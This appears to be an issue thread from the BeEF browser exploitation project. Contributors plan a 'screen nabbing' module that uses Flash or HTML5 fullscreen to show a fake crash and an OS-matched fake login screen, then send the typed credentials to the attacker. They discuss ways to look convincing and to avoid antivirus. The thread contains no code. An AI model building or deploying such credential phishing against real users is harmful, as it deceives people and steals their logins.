I have been trying to code this but im terrible with Actionscript, consider this
the full screen executes the user is told to hit escape to escape fullscreen and as that message fades a Blue Screen of Death flickers and your logged out. you should log back in, BSoD! crap! is my work safe ?!
what just happened was the swf/(and beef?) have made an educated guess on your OS and loaded the images to satisfy a identical log in screen for your operating system. the username and password are POSTed back to the attacker/beef
I'm not sure if it could go as far as getting the username but that would be great too
if the attack is successful you will obtain the current users credentials to further your attack - and the AV doesn't need know about any of this as it's just asking you to submit your user and password
As I said before I'm terrible at Actionscript, but I know that swf will do a nice fullscreen might be nice to deploy as an exe too(or .app depending on how good the fingerprinting can get) - and using educated guesses on default user icon's etc.
I'd love to see this, would you ?
I like this idea.
The Windows logon page probably won't have to be too accurate if the users want to save their work.
We might have to use something generic on the login page, like "Administrator" or "System Recovery" for the username. A "Restore your work" message might help.
It may be possible to get the username if Flash can read environment variables or local file system paths (either directly or indirectly by catching error messages) ?
I have been having a look at retrieving the username via environment variables but I think your catching an error message is a great idea.
It would be nice if there is a actionscript ninja among us, I can only help with .. the initial idea and creating the supporting graphics (unless you could have local file access via flash then you could load most default backgrounds and icons up via that )
but the error catching sounds great, I can't wait to see how this pan's out :)
Just had an interesting chat with a colleague and this attack could dip into application layer credential stealing too .. modular perhaps
such as http://4.bp.blogspot.com/-hBANnl3V4Pc/Tce_z7OHScI/AAAAAAAAAEM/Hp-GOVrcAnM/s1600/auth-failed.PNG
From the Security Considerations section of https://www.adobe.com/devnet/flashplayer/articles/full_screen_mode.html
An overlay dialog box will appear when the movie enters full-screen mode, instructing the user how to exit and return to normal mode. The dialog box appears for a few seconds and then fades out.
Users cannot enter text in text input fields while in full-screen mode. All keyboard input and key-related ActionScript is disabled while in full-screen mode, with the exception of the keyboard shortcuts that take the viewer out of full-screen mode.
I'm not sure if it's possible to get around this. Maybe we could use Java or HTML5?
Firefox 15 authorizes fullscreen but it shows a big error message to inform the user that the fullscreen is made by the website. So I don't know if it's really exploitable.
Any test with Chrome/Safari?
Have a look at this : http://feross.org/html5-fullscreen-api-attack/ https://github.com/feross/fullscreen-api-attack
I saw that ;) thanks.
Anyone wants to have a look at it and port it eventually to BeEF?
Issue #702 is now assigned to you xntrik. Milestone: 0.4.3.9-alpha
Firefox shows a big notification while the chrome notification is really discreet. I've taken screenshot here and here.
The point is that you will have to detect the browser and OS of the user and create an relevant picture and many details can't be adapted (bookmarks, user name...). So I doubt it will be effective in most cases. But it would be good to have a first version in BeEF :)
Okies, this issue has gone through a number of iterations and now we seem to be happy with http://feross.org/html5-fullscreen-api-attack/
The problem though, as rightly pointed out by Nbblrr, is that this require an image of the spoofed site to be created in advance (although, I don't understand why the spoofed content can't just be actual content instead of an image?)
I can see, potentially, that this module might be more useful as a POC, but, actually using it, at least in it's current state, would be pretty darn difficult.
OH! you want to spoof the login page... right...
Mental note to self, to capture a screenshot of my lock screen I need to http://apple.stackexchange.com/questions/21094/lock-screen-screenshots and http://superuser.com/questions/103310/screen-capture-in-mac-is-all-black
I can then cut it up and recreate a 'phish' of that with a 'password' dialog.
Most browsers implement a "Now entering fullscreen mode" warning. It might be useful to add a 'wait time' option - similair to tabnabbing. Does this 'attack' have a name yet? I nominate 'screen nabbing'
Nah, you can't send fullscreen behind. I think fullscreen will fail silently if the current tab is not active.
@Xntrik still keen to implement this functionality?